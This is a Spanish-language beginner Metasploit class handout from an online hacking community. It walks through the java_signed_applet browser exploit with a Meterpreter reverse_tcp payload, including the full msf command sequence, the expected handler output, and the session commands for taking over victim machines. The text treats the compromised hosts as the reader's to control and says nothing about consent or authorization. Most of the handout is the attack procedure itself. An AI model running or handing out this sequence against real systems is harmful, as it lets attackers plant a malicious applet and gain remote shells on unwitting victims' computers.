You are on page 1of 2

##################################################################### Curso de Metasploit Numero: 00002 Luis Fernando Valladares R.

- KuRf3K 07/03/2013 Nivel : Basico #####################################################################

Para todos los que estuvieron en la clase pasada de la Comunidad LatinHack aqui va el resumen de lo tratado en la clase del 06/03/2013 Ataque utilizando Exploit de Java ================================== (Ahora le cargaremos el Payload java/meterpreter/reverse_tcp) Exploit : java_signed_applet 1. 2. 3. 4. 5. 6. 7. 8 msf> msf> msf> msf> msf> msf> msf> msf> use exploit/multi/browser/java_signed_applet set payload java/meterpreter/reverse_tcp set lhost (su ip local va aqui) set target 0 set uripath / set svport 8080 set lport 4444 exploit

Debera de salir si todo fue bien : [*] [*] [*] [*] [*] Exploit running as background job. Started reverse handler on 192.168.1.50:4444 Using URL: http://0.0.0.0:8080/ Local IP: http://192.168.1.50:8080/ Server started.

8. Para ver las conexiones existentes o maquinas que hayan sigo afectadas por e l exploit escribe : msf> sessions 9. Si pueden ver alguna session de una maquina victima entran en ella de la siguiente manera : msf> sessions -i 1 (1 indica el numero id de sesion de cada maquina victima ) 10. Si todo va bien tiene que abrirles la consola del Meterpreter y Voila!, ya p

ueden hacer lo que desean dentro de la maquina hackeada, los comandos del Meterpreter los verem os despues Cualquier pregunta en la Comunidad LatinHack : https://www.facebook.com/groups/comunidadlatinhack/269841833148750/?notif_t=grou p_activity o a mi facebook: https://www.facebook.com/luis.valladaresrosillo Suerte y Happy Hacking !!!! :)))))))))

You might also like